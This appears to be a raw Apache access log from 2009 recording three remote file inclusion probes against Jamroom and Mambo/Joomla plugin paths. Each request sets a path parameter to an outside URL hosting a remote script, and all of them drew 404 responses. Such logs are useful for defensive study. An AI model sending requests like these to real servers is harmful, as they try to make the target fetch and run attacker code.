93.190.49.3 - - [17/Oct/2009:04:27:34 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:27:34 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:04:27:39 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
